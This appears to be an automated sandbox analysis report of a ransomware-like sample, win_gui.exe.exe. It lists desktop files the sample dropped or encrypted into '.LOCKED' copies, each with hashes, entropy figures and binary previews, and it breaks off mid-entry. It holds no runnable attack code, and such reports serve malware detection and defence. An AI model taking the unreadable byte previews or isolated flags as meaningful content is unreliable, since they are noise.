                                Preview:...(...ou.^.G..>.... ........|.....XM.G*..`.........xi..T...).....T<...k\UP4....B..G.W..i.CU.-.J_.............y.{....s.......i...e/....@s7WL6......B.-....&N..>e.e0..7a.......5i..p.......h.1..4bvV.....'d..b..X.8T}FX._.l...72.&...J..>k*?7IQ...5.<-...J..z.63J...h.m.....0s.)..Dd7.t..n7`lk1.9..&..Q.,.0=.......'>0[..U.0,:y]wWZ.*..E.>.).)...M..Q...t.u...>....Z.&...H..[A):.....,.cO]...18..l :".....e3+..Td...H....W..]'..K.7a...C......w.Z......sRV..8.FM..7(G..-...g.p..../)'q.N5.8:{.E...?d^.z(.Q....A......~..7.[...iu.6i.:...u.}_...$.Z)..].......rC.vM1h.4z.......LO.j.+.|...#..!kb..KW..Y.=.N.M.&..36{...Z...SfS*=bK.M:B...=.G..Zn....G.p..;...;.f3...X..i.p...P....J..P.V~j.'.V...f...L7..*.{1^.../....[&LTb\.....Z.).}......Q7..d.h...y.j....9j{jq..EF./^.H.&.....0 B{..yp...J...S88\=;.O.$_..a..J.B.b.*+d..)..m..&.....<{..h..... ...g..Vc>..vi.....c....K..y#[...p.."&E1.k...v[v.9..O..uP.6Q....`..`..HU...n...p.a..`&mj%A..w.e{ .p........u.K.....:.D.. .......#.Y.....!...8GB...uG

                                C:\Users\user\Desktop\DUUDTUBZFW.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878010680561289
                                Encrypted:false
                                SSDEEP:48:8+hUM22e5PKDqOF4lviahJysvDZ/WyYu+MAVMJg6TO:8+ha2nqRlXhJbv9evuAVOO
                                MD5:D9A6088E5B1536691AAC7A0D51FD47DB
                                SHA1:4B3B5F1357A4D0378D625C530333C794E7912ED3
                                SHA-256:99D1E487CD6BEB45E3AFA254655603ECF16CABF122D0A1ADE8A03A202ECA5C1B
                                SHA-512:96B1481A7F2E62341D28AF5D316D62854288CBA8DADEADB2EE9BBB8A6AAD7A10E8EF2878F0E922E5DF5691E035E81EC41DAF4D1521E576AF196CFF23628300A8
                                Malicious:false
                                Preview:...(...ou.^.G..>.... ........|.....XM.G*..`.........xi..T...).....T<...k\UP4....B..G.W..i.CU.-.J_.............y.{....s.......i...e/....@s7WL6......B.-....&N..>e.e0..7a.......5i..p.......h.1..4bvV.....'d..b..X.8T}FX._.l...72.&...J..>k*?7IQ...5.<-...J..z.63J...h.m.....0s.)..Dd7.t..n7`lk1.9..&..Q.,.0=.......'>0[..U.0,:y]wWZ.*..E.>.).)...M..Q...t.u...>....Z.&...H..[A):.....,.cO]...18..l :".....e3+..Td...H....W..]'..K.7a...C......w.Z......sRV..8.FM..7(G..-...g.p..../)'q.N5.8:{.E...?d^.z(.Q....A......~..7.[...iu.6i.:...u.}_...$.Z)..].......rC.vM1h.4z.......LO.j.+.|...#..!kb..KW..Y.=.N.M.&..36{...Z...SfS*=bK.M:B...=.G..Zn....G.p..;...;.f3...X..i.p...P....J..P.V~j.'.V...f...L7..*.{1^.../....[&LTb\.....Z.).}......Q7..d.h...y.j....9j{jq..EF./^.H.&.....0 B{..yp...J...S88\=;.O.$_..a..J.B.b.*+d..)..m..&.....<{..h..... ...g..Vc>..vi.....c....K..y#[...p.."&E1.k...v[v.9..O..uP.6Q....`..`..HU...n...p.a..`&mj%A..w.e{ .p........u.K.....:.D.. .......#.Y.....!...8GB...uG

                                C:\Users\user\Desktop\DUUDTUBZFW.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866989580192017
                                Encrypted:false
                                SSDEEP:48:/pkHUUkJHoyyBH8BgHBkP/WyYu+MAVMJg6T0yk:/nxXyBcBgHCPevuAVOZk
                                MD5:BC649D68CAE9B82B7B27959B1134153F
                                SHA1:49D842817156F4BB5BC34519B0235F31E8C42E3F
                                SHA-256:69AB922269B75628BC6374A8320064DDA057E8209028DD209E6CE2245838BAA1
                                SHA-512:95EC3246B7862EB748FBE163BE1BB806B07E2808067B7D9D8893F6A1D0ED0F1F74D34A244834810FFEF9E627681AB4D501C2939C1F6629D1C6010A426F82B971
                                Malicious:true
                                Preview:#.L.!..V.gA.<.Z.,N..^..}n..^.:. ..,D5...+.{...e..k.....&yho...%....N.y.L6.J%$..ib......R.L..kMs.... ?..=..V.....u......-....a.Kk.9<.b..\.<.U.... ...&_.e...........V.f.y....6....#.*X..5!...M.7.q../.....D/....d..yDg.....\.=..{q.T.:.w../|G.....6..j....N..*...;.T.K-.:G-.(....%.~..Z..Fwn.v...x.B..TyE.......\.n....d.B...ijt...4e1.$.....FIxfp=j4.~....}../.,.c.d.....$M.uU....7.....k.ZeV.....;D.....L..y.[]=.3......M...R...s.Ww..y.........Q.......);Y/..gGL.#.*.Q.D...C.w......._..7..6...RI.+..<.D....Xi.lTIu.7.s.[...%.!L9..-....sO..G.N.SY0.K.........&......._.a.Yrtc(&.:.&.....$.Yk\.s.h9.(.@6.5{....3v.....E...)...mv..3....H...2e.6d*I[...m..9t..9..z.....1k{P-......P..(...`e.-........J:.<j.<..i.50T..).....;.Z,....e.!.......g.A[4.R.I..HA..q../....Iw4<.....#,.W......!.....n\w.C6.....iA..[q.....z3k/d....C..+.N.h.........a^..uTI.. .uDGS*h...x.t...R...&;..K.u..t..G.]G7 .n.t.."D...u...Q...j....G.DF,.......U3!......Q.....".a.I....q<.-'#.....`R......c1../.2.z

                                C:\Users\user\Desktop\DUUDTUBZFW.xlsx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866989580192017
                                Encrypted:false
                                SSDEEP:48:/pkHUUkJHoyyBH8BgHBkP/WyYu+MAVMJg6T0yk:/nxXyBcBgHCPevuAVOZk
                                MD5:BC649D68CAE9B82B7B27959B1134153F
                                SHA1:49D842817156F4BB5BC34519B0235F31E8C42E3F
                                SHA-256:69AB922269B75628BC6374A8320064DDA057E8209028DD209E6CE2245838BAA1
                                SHA-512:95EC3246B7862EB748FBE163BE1BB806B07E2808067B7D9D8893F6A1D0ED0F1F74D34A244834810FFEF9E627681AB4D501C2939C1F6629D1C6010A426F82B971
                                Malicious:false
                                Preview:#.L.!..V.gA.<.Z.,N..^..}n..^.:. ..,D5...+.{...e..k.....&yho...%....N.y.L6.J%$..ib......R.L..kMs.... ?..=..V.....u......-....a.Kk.9<.b..\.<.U.... ...&_.e...........V.f.y....6....#.*X..5!...M.7.q../.....D/....d..yDg.....\.=..{q.T.:.w../|G.....6..j....N..*...;.T.K-.:G-.(....%.~..Z..Fwn.v...x.B..TyE.......\.n....d.B...ijt...4e1.$.....FIxfp=j4.~....}../.,.c.d.....$M.uU....7.....k.ZeV.....;D.....L..y.[]=.3......M...R...s.Ww..y.........Q.......);Y/..gGL.#.*.Q.D...C.w......._..7..6...RI.+..<.D....Xi.lTIu.7.s.[...%.!L9..-....sO..G.N.SY0.K.........&......._.a.Yrtc(&.:.&.....$.Yk\.s.h9.(.@6.5{....3v.....E...)...mv..3....H...2e.6d*I[...m..9t..9..z.....1k{P-......P..(...`e.-........J:.<j.<..i.50T..).....;.Z,....e.!.......g.A[4.R.I..HA..q../....Iw4<.....#,.W......!.....n\w.C6.....iA..[q.....z3k/d....C..+.N.h.........a^..uTI.. .uDGS*h...x.t...R...&;..K.u..t..G.]G7 .n.t.."D...u...Q...j....G.DF,.......U3!......Q.....".a.I....q<.-'#.....`R......c1../.2.z

                                C:\Users\user\Desktop\EFOYFBOLXA.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867104493461105
                                Encrypted:false
                                SSDEEP:48:CI3hOcgqOIxnkXcvkhHNPd67jZ/WyYu+MAVMJg6T9:B3hvgqOIxnjvM67jZevuAVO9
                                MD5:16404155B593D22D2821828127D14F3D
                                SHA1:52ADEB9C793A6F31686F4A6AC4D4361DA93D4B75
                                SHA-256:270F05A0B45BDB18D11BFB0407AC9126ADCEB113287A231FFDB4490CB56EF9A9
                                SHA-512:AB7AF397AB874EDF8E775A283B0103B5A9AA142D8C83DF946080F01C323D7961A9A399DB195137280AEB20C6805CE26B45F0A41909750FC2F8228E5B6527351E
                                Malicious:false
                                Preview:Ze.....|.s.V..23........h.f]..KJ-^.....$...v%&.i..%^..5.9.{f.z..%...~.%...S.-w....EL|hz...iK.w$...y...kI.Q..L.1..>-UZ`...X_E.....t.b..@V.".Q.#.._x`....c2xj...6.....Ut...J1..Ud.yj5i.ONFF.p.kSwn.Ev..|./.c..i.Z..%..;.....a..I.D.e....Ud._...C......H.....J.lX.@...X.C...<.h)...0@.6PH........Q...l.N$...=:IV.........00.$,...ne(%y.'~........!H..A_.+..||.mG.5.(j...u..pQ...-...."..x...5FETW..8..Oz."..|f.r...H.\o;cO.Y...L.X%......G....t5QGj..._t.r.F....w.t..%..P$p..t..W.......A..AP).W..i......P..\....r..........?.h..T+....K..'l....2.X........)d....*.G.'..'......T.1.#...3ME../..S...V..8../.Z5..-....}..d...(.9>}jP..A....5.\M5..b..B..Q.U.w..M.g.2c6....}..F...O.._.`rY .P.!..b..c<.}.)X.o'..qf......4.u.8.X...u|d..Y:.i..X#..3..A.5..<.Sa.(.h.3..a4.C.@...tpl...kw.|... ..l...S..i...,d.V.s..z[.b8n.[..d..^....'...N0.......<..F.....P...d]...J.Y\Q.....r....Qm.3.....qK.}. k.0..L......s..m...^..3.;!.td..N...L....(...." -.3...R.|...........p0A.E...{Sm.[..T.E..

                                C:\Users\user\Desktop\EFOYFBOLXA.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867104493461105
                                Encrypted:false
                                SSDEEP:48:CI3hOcgqOIxnkXcvkhHNPd67jZ/WyYu+MAVMJg6T9:B3hvgqOIxnjvM67jZevuAVO9
                                MD5:16404155B593D22D2821828127D14F3D
                                SHA1:52ADEB9C793A6F31686F4A6AC4D4361DA93D4B75
                                SHA-256:270F05A0B45BDB18D11BFB0407AC9126ADCEB113287A231FFDB4490CB56EF9A9
                                SHA-512:AB7AF397AB874EDF8E775A283B0103B5A9AA142D8C83DF946080F01C323D7961A9A399DB195137280AEB20C6805CE26B45F0A41909750FC2F8228E5B6527351E
                                Malicious:false
                                Preview:Ze.....|.s.V..23........h.f]..KJ-^.....$...v%&.i..%^..5.9.{f.z..%...~.%...S.-w....EL|hz...iK.w$...y...kI.Q..L.1..>-UZ`...X_E.....t.b..@V.".Q.#.._x`....c2xj...6.....Ut...J1..Ud.yj5i.ONFF.p.kSwn.Ev..|./.c..i.Z..%..;.....a..I.D.e....Ud._...C......H.....J.lX.@...X.C...<.h)...0@.6PH........Q...l.N$...=:IV.........00.$,...ne(%y.'~........!H..A_.+..||.mG.5.(j...u..pQ...-...."..x...5FETW..8..Oz."..|f.r...H.\o;cO.Y...L.X%......G....t5QGj..._t.r.F....w.t..%..P$p..t..W.......A..AP).W..i......P..\....r..........?.h..T+....K..'l....2.X........)d....*.G.'..'......T.1.#...3ME../..S...V..8../.Z5..-....}..d...(.9>}jP..A....5.\M5..b..B..Q.U.w..M.g.2c6....}..F...O.._.`rY .P.!..b..c<.}.)X.o'..qf......4.u.8.X...u|d..Y:.i..X#..3..A.5..<.Sa.(.h.3..a4.C.@...tpl...kw.|... ..l...S..i...,d.V.s..z[.b8n.[..d..^....'...N0.......<..F.....P...d]...J.Y\Q.....r....Qm.3.....qK.}. k.0..L......s..m...^..3.;!.td..N...L....(...." -.3...R.|...........p0A.E...{Sm.[..T.E..

                                C:\Users\user\Desktop\EFOYFBOLXA.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866722339297308
                                Encrypted:false
                                SSDEEP:48:/q1l96hBm6CeMZGVS9SI2s8shk/WyYu+MAVMJg6Tba:/qF6hBzCuVS9Sla+evuAVOe
                                MD5:1231713E44AE49AE247BE998B295E7CE
                                SHA1:58F7C49A280A3C311C2477876617F6E5F15D5773
                                SHA-256:D1FA83DFFB0C416793E1A173CE958C2E64C6C874731ECC3F8570C09D23F4FDBA
                                SHA-512:EF1AD4B93EB287E0355513EEA0C5F1250F55995CD1C157AE97219500CCD3E66D4B72CA6039E8B6445D280A584EE320C7A30F9DEA7CF6C1587872C460773EE406
                                Malicious:false
                                Preview:`..Y.......'..?:.F.zq[..wl..G@.8.s..yz.8@...N.J...wD2.......-....K.K..._..pY.3..>:.d.)......iu.oH..H.-...)..~Dk}..q.... ..td.0G`......A+|.d...........yN..u:..v$.l....x.]......{k/...x. %..2.S.-..Z..B>.s...6..5...i..U..0.....e.e.C......D.VN.D^..LP.%....a.y....I.u....OIu.......v.........%..r..t....._GzCo..G...9...o_x.p...I.L....w.,x..{..........2.e..-.Q..H.8..S.h..!....=x..[@...z/.B.B,...wN Z../g&aKe..-(`..W##?XH.v............~..D..x.......o.B.)u...h..L....#........cH.....a..H,.4..h..}Y.2..H....r}..^.G ..Lx.j..|....=.U..*.....$.|..U...R.H..w..l..*,.).y.W.....x..5.....2m~.k~j....'..[..b&33Y.w.eb.r...T.<.7.o..W......4T?..U.%.iu$'I..G...)..+..8...!2....:.1.~s..........M.R..G.0........{yz..$.GNU....9....Zx.LoS?..q.1.?..j.o".~....a.........A)..#...q..e...N..g5N.y.)E...b.C.e.PB..h.A....X...\Yb.....C.|...p......T..lc...7.......d{......;.K.P.}a..l.l...X.i.8a......FY.U.5..4.R.Mb..W.].p..<h..b....g.S..%..b.`..'............L...1..}....u.....C.=~|.;.=~!..

                                C:\Users\user\Desktop\EFOYFBOLXA.xlsx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.866722339297308
                                Encrypted:false
                                SSDEEP:48:/q1l96hBm6CeMZGVS9SI2s8shk/WyYu+MAVMJg6Tba:/qF6hBzCuVS9Sla+evuAVOe
                                MD5:1231713E44AE49AE247BE998B295E7CE
                                SHA1:58F7C49A280A3C311C2477876617F6E5F15D5773
                                SHA-256:D1FA83DFFB0C416793E1A173CE958C2E64C6C874731ECC3F8570C09D23F4FDBA
                                SHA-512:EF1AD4B93EB287E0355513EEA0C5F1250F55995CD1C157AE97219500CCD3E66D4B72CA6039E8B6445D280A584EE320C7A30F9DEA7CF6C1587872C460773EE406
                                Malicious:false
                                Preview:`..Y.......'..?:.F.zq[..wl..G@.8.s..yz.8@...N.J...wD2.......-....K.K..._..pY.3..>:.d.)......iu.oH..H.-...)..~Dk}..q.... ..td.0G`......A+|.d...........yN..u:..v$.l....x.]......{k/...x. %..2.S.-..Z..B>.s...6..5...i..U..0.....e.e.C......D.VN.D^..LP.%....a.y....I.u....OIu.......v.........%..r..t....._GzCo..G...9...o_x.p...I.L....w.,x..{..........2.e..-.Q..H.8..S.h..!....=x..[@...z/.B.B,...wN Z../g&aKe..-(`..W##?XH.v............~..D..x.......o.B.)u...h..L....#........cH.....a..H,.4..h..}Y.2..H....r}..^.G ..Lx.j..|....=.U..*.....$.|..U...R.H..w..l..*,.).y.W.....x..5.....2m~.k~j....'..[..b&33Y.w.eb.r...T.<.7.o..W......4T?..U.%.iu$'I..G...)..+..8...!2....:.1.~s..........M.R..G.0........{yz..$.GNU....9....Zx.LoS?..q.1.?..j.o".~....a.........A)..#...q..e...N..g5N.y.)E...b.C.e.PB..h.A....X...\Yb.....C.|...p......T..lc...7.......d{......;.K.P.}a..l.l...X.i.8a......FY.U.5..4.R.Mb..W.].p..<h..b....g.S..%..b.`..'............L...1..}....u.....C.=~|.;.=~!..

                                C:\Users\user\Desktop\EIVQSAOTAQ.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878426947338794
                                Encrypted:false
                                SSDEEP:48:lmZSG0KG/2kxWpymU9/WyYu+MAVMJg6Tfu:lmZSG0KSxAymU9evuAVOfu
                                MD5:77F327C2574B2648D1830603801902DD
                                SHA1:9740651C724421C5834CE3DDE0A0379C3C792B20
                                SHA-256:79465EE6E1625AD23BBDF852CC0FBEA1E6E3F6DA6157BBA3EA0A5631003BA0DE
                                SHA-512:59B3EE2291322A90999785032045612E015286899B5EA4777FB86E7AFF65F9DBD05989C4BF3BFB0DEB339A2FE22DD658EA5CB55541836845B8BE3E6160C1A029
                                Malicious:true
                                Preview:.HDz2...Y...a...D....J..B.WmA=B..t..1l..E.y\]bT...j8..AP.o#h}....P6f>..#...V.......eATRNn.)"..u.....va:;...z.z.C'.....}..xY..T.5..7...!5a.......X.$.G.d].._..n.....6.Bv{...~...,M..-.8.u,.>.3.._.a[.V......1SJ..`@.....v.D..q...n.2&k.}....\.q......l.U.D.Q.Gb......q.......h.HA.;(t..+..M.@.t!..'."..!.3E.FT/..Y...V.Xp...V..j.._..F...\...V86.............e.9..,..9....:E .n.kjzh......^.uJQ.#4.E\[J...?.........4,h..B.g...-...e.`E....#C..!y.k.a] b..f.n./....A...3].p;.1.G%&. .l..F.)...+ .1..-..'..L.C9E...........:+.....~...Qi.....N..n.H.`..........c...%...........1.Jyb...[6gK-....k.}0...P.q.mw9.%m....(...}...XB.9uy...)..wU+7.~e.......R..@T.?6.......>..<.....*..Q....../...R.."6..S...ct..R..i9.e.V.7x...CG.W..G.:..A|.:6.}x^r/H...]..Z..q.....8......8.&%+.Y9.+2..|.))E(..iAc.|].L..(.+..G..B./..7.(....L43.SnXk.6..$....T.I.s..;.....<.u..d.0..:x.3..b.....8.%..y...c....z.#.......e...r.....@.c~..@.....O.)yM..!h..*.....z...i.%n....`%......"?.V...8"u....~..

                                C:\Users\user\Desktop\EIVQSAOTAQ.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.878426947338794
                                Encrypted:false
                                SSDEEP:48:lmZSG0KG/2kxWpymU9/WyYu+MAVMJg6Tfu:lmZSG0KSxAymU9evuAVOfu
                                MD5:77F327C2574B2648D1830603801902DD
                                SHA1:9740651C724421C5834CE3DDE0A0379C3C792B20
                                SHA-256:79465EE6E1625AD23BBDF852CC0FBEA1E6E3F6DA6157BBA3EA0A5631003BA0DE
                                SHA-512:59B3EE2291322A90999785032045612E015286899B5EA4777FB86E7AFF65F9DBD05989C4BF3BFB0DEB339A2FE22DD658EA5CB55541836845B8BE3E6160C1A029
                                Malicious:false
                                Preview:.HDz2...Y...a...D....J..B.WmA=B..t..1l..E.y\]bT...j8..AP.o#h}....P6f>..#...V.......eATRNn.)"..u.....va:;...z.z.C'.....}..xY..T.5..7...!5a.......X.$.G.d].._..n.....6.Bv{...~...,M..-.8.u,.>.3.._.a[.V......1SJ..`@.....v.D..q...n.2&k.}....\.q......l.U.D.Q.Gb......q.......h.HA.;(t..+..M.@.t!..'."..!.3E.FT/..Y...V.Xp...V..j.._..F...\...V86.............e.9..,..9....:E .n.kjzh......^.uJQ.#4.E\[J...?.........4,h..B.g...-...e.`E....#C..!y.k.a] b..f.n./....A...3].p;.1.G%&. .l..F.)...+ .1..-..'..L.C9E...........:+.....~...Qi.....N..n.H.`..........c...%...........1.Jyb...[6gK-....k.}0...P.q.mw9.%m....(...}...XB.9uy...)..wU+7.~e.......R..@T.?6.......>..<.....*..Q....../...R.."6..S...ct..R..i9.e.V.7x...CG.W..G.:..A|.:6.}x^r/H...]..Z..q.....8......8.&%+.Y9.+2..|.))E(..iAc.|].L..(.+..G..B./..7.(....L43.SnXk.6..$....T.I.s..;.....<.u..d.0..:x.3..b.....8.%..y...c....z.#.......e...r.....@.c~..@.....O.)yM..!h..*.....z...i.%n....`%......"?.V...8"u....~..

                                C:\Users\user\Desktop\EWZCVGNOWT.png

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.86726853483015
                                Encrypted:false
                                SSDEEP:48:UHDRpiXpwznTlkWE+VS/WyYu+MAVMJg6T4:UHDRpL62SevuAVO4
                                MD5:B744F71EAD1CC6FF885A773C5E412A09
                                SHA1:097E80FDE8942637DEC1187A3E8DEF1E79012809
                                SHA-256:87F67136E07D417FB348320053F2447C300E01C25E243A5A3DBFE634A16A7360
                                SHA-512:983D6D38DCED5C6445CFA4451726870EED5346FC7E4B17EFBC6647443311F457677AA83206E866986FB0E731A29771C6914F87B29D17054743017188C8D59868
                                Malicious:false
                                Preview:n..l..!..)._.2d>y....,.~NB.U.a..V.z"<.qo.94...'F..1.N....5.$=...Xhe...xEvP..r....LU...h.{...._.X....S,..Q....$#H...(.l..'.bb\+1..#=.G........!.j>..F..(e.8...t.n..MG.I...H..A....S+.. .c..H.t......so.!A{.../(..'L5~...p.'.....A,k.,..m.d*}.Qw<z./.C...{.0C.!....]...r'c ...g..j.A5.]j.ip..c..:.h......a[.kQ.F...K......"....W..p..`...^..g...`}xK..N7......)t.9...t...m.G.Z?=..8.r....IQ..7g.r.;.f..D..(+.|..).,......H.y.-#!A4.o|.>.G~|Y..fr.....p.............|.%./L80.bQ2}4..[..Nw..D.N3....Z.c6W..H.\q*...`..g?.<....'.Q...V...%..B..vJ..X7..w..R....n.0.t...'.I...].$~*%....0..[....1.".h.......[;..)....X0c...(_...hH..)t.#c4E.z.Q...".&..z.;..+.....k..kS..-'Y...Y.(:o.f.V..w[..........>....1`k.K.......s$r..e.q....."...G'`.l....a}.`z.30?:.z..W#%?..........v<O.Un.>ck.y@..|.O.1.n.X.^.*p............r$.&U.._.6#.>..>.....CM,._.v.3b.....%.D.x.W...U.K../.-o[.JNi.v..cg...f......q4YZQ..2.".....#..4.5......8.....n.).H.U. .UR.mD....+.#...U.).91.)._\.2......s=..hl......na.

                                C:\Users\user\Desktop\EWZCVGNOWT.png.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.86726853483015
                                Encrypted:false
                                SSDEEP:48:UHDRpiXpwznTlkWE+VS/WyYu+MAVMJg6T4:UHDRpL62SevuAVO4
                                MD5:B744F71EAD1CC6FF885A773C5E412A09
                                SHA1:097E80FDE8942637DEC1187A3E8DEF1E79012809
                                SHA-256:87F67136E07D417FB348320053F2447C300E01C25E243A5A3DBFE634A16A7360
                                SHA-512:983D6D38DCED5C6445CFA4451726870EED5346FC7E4B17EFBC6647443311F457677AA83206E866986FB0E731A29771C6914F87B29D17054743017188C8D59868
                                Malicious:false
                                Preview:n..l..!..)._.2d>y....,.~NB.U.a..V.z"<.qo.94...'F..1.N....5.$=...Xhe...xEvP..r....LU...h.{...._.X....S,..Q....$#H...(.l..'.bb\+1..#=.G........!.j>..F..(e.8...t.n..MG.I...H..A....S+.. .c..H.t......so.!A{.../(..'L5~...p.'.....A,k.,..m.d*}.Qw<z./.C...{.0C.!....]...r'c ...g..j.A5.]j.ip..c..:.h......a[.kQ.F...K......"....W..p..`...^..g...`}xK..N7......)t.9...t...m.G.Z?=..8.r....IQ..7g.r.;.f..D..(+.|..).,......H.y.-#!A4.o|.>.G~|Y..fr.....p.............|.%./L80.bQ2}4..[..Nw..D.N3....Z.c6W..H.\q*...`..g?.<....'.Q...V...%..B..vJ..X7..w..R....n.0.t...'.I...].$~*%....0..[....1.".h.......[;..)....X0c...(_...hH..)t.#c4E.z.Q...".&..z.;..+.....k..kS..-'Y...Y.(:o.f.V..w[..........>....1`k.K.......s$r..e.q....."...G'`.l....a}.`z.30?:.z..W#%?..........v<O.Un.>ck.y@..|.O.1.n.X.^.*p............r$.&U.._.6#.>..>.....CM,._.v.3b.....%.D.x.W...U.K../.-o[.JNi.v..cg...f......q4YZQ..2.".....#..4.5......8.....n.).H.U. .UR.mD....+.#...U.).91.)._\.2......s=..hl......na.

                                C:\Users\user\Desktop\Excel.lnk

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3063
                                Entropy (8bit):7.932219646503449
                                Encrypted:false
                                SSDEEP:48:xUdcIsJCK6RYlJ6FHcn4pgr8kN6JNVx1596Scxtv9gX/vX1nzhLpxd1sAjPs/WyP:xLzoSc9kmgrzN6JNVx0XtW1FnsiUevur
                                MD5:3584C6462E07FD835EA897E3B4A14698
                                SHA1:F28066197DCD2CEE7D67658CB2C2A6C1858BE4D2
                                SHA-256:713B78C7682BC333DE582BEE82E7AA5D4D8F6B677399AD6B0F10D9F9E443FC3C
                                SHA-512:B41F03A523BCED66C4F96376A60DD0F638447E4EA83C96DFFD64301EC49DB43BC861775F9878A6D56E7A34C48139B7A03CB00B7A8899AE5A91660DEFCB535BFC
                                Malicious:false
                                Preview:.....<...O...$.[..S..f.|..BAy0r+K5(.e..4.'=..H.w{7SG....!..zU.n..4G.....Z.d}.in.P!..mO...3`.|.q4u.d...K"H...l;.B.l.[y..EFu.........^.$..m.E?.{.=.H...U..k\;.N.\$..w........%..nn-...P.0.....:V.7U.$...1j.-..q&I..}.|....m{.O...^;.5f......Y..t..z.N9e...C.3.p/.g5v....*.4...a....F..y..9F.E.{%.p.|c^..6b...<.K.~....$eU.....\..eO.7(..r....v,.Q..i.J)..H.*[K.P......w....../........|+1......7..%.G...&7.../...D..%l%.....].z..2.N.GN......Hd.E.@.]...nO.W@.....d...N.y..K.<..Q.4...Ws.B.f.u._v...p.].K....$._.!v.t q.<...".?..K.]+.!.z...y......W.p..A...P...f..Eq.b.........(...;...#V...._... n..V...u.a.....5;../..$D{"`..pn..."_......r..:.2<..Y.....Q.R.);Ui...j..yX.....U...Q..$..k...!.l...k..K....e...n..._V.A..0d..'Wqa..J.HAil.f7VT8.PJ0...J..p.*...s ..{..g.?.....@.?........v.v....P.-..\,V........E.B.>...{...j....(....F.s?...U.S..*...|g..|.F....LK....F...Z....l..B=@SG....q.[./j`Wq..[..U.BN..y-Y....jO..\..[...S......`6.......7[T......Z%nhK.._.K...J.

                                C:\Users\user\Desktop\Excel.lnk.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3063
                                Entropy (8bit):7.932219646503449
                                Encrypted:false
                                SSDEEP:48:xUdcIsJCK6RYlJ6FHcn4pgr8kN6JNVx1596Scxtv9gX/vX1nzhLpxd1sAjPs/WyP:xLzoSc9kmgrzN6JNVx0XtW1FnsiUevur
                                MD5:3584C6462E07FD835EA897E3B4A14698
                                SHA1:F28066197DCD2CEE7D67658CB2C2A6C1858BE4D2
                                SHA-256:713B78C7682BC333DE582BEE82E7AA5D4D8F6B677399AD6B0F10D9F9E443FC3C
                                SHA-512:B41F03A523BCED66C4F96376A60DD0F638447E4EA83C96DFFD64301EC49DB43BC861775F9878A6D56E7A34C48139B7A03CB00B7A8899AE5A91660DEFCB535BFC
                                Malicious:false
                                Preview:.....<...O...$.[..S..f.|..BAy0r+K5(.e..4.'=..H.w{7SG....!..zU.n..4G.....Z.d}.in.P!..mO...3`.|.q4u.d...K"H...l;.B.l.[y..EFu.........^.$..m.E?.{.=.H...U..k\;.N.\$..w........%..nn-...P.0.....:V.7U.$...1j.-..q&I..}.|....m{.O...^;.5f......Y..t..z.N9e...C.3.p/.g5v....*.4...a....F..y..9F.E.{%.p.|c^..6b...<.K.~....$eU.....\..eO.7(..r....v,.Q..i.J)..H.*[K.P......w....../........|+1......7..%.G...&7.../...D..%l%.....].z..2.N.GN......Hd.E.@.]...nO.W@.....d...N.y..K.<..Q.4...Ws.B.f.u._v...p.].K....$._.!v.t q.<...".?..K.]+.!.z...y......W.p..A...P...f..Eq.b.........(...;...#V...._... n..V...u.a.....5;../..$D{"`..pn..."_......r..:.2<..Y.....Q.R.);Ui...j..yX.....U...Q..$..k...!.l...k..K....e...n..._V.A..0d..'Wqa..J.HAil.f7VT8.PJ0...J..p.*...s ..{..g.?.....@.?........v.v....P.-..\,V........E.B.>...{...j....(....F.s?...U.S..*...|g..|.F....LK....F...Z....l..B=@SG....q.[./j`Wq..[..U.BN..y-Y....jO..\..[...S......`6.......7[T......Z%nhK.._.K...J.

                                C:\Users\user\Desktop\GLTYDMDUST.png

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.86960514371218
                                Encrypted:false
                                SSDEEP:48:D/OSJXq1udgb4NqBoUb0F1OU1/Z/WyYu+MAVMJg6TT2+:1JOuab4NeoUbmOUlZevuAVOTH
                                MD5:205F57F42A4231AF0123C929A27209BE
                                SHA1:E29372C6E0211E7FE78A019F4F17FD7AC54E7868
                                SHA-256:78C5C58025B5524C09A66EF53F48D5DB80E919F6940AEFD3E9C0F2002B7B13C9
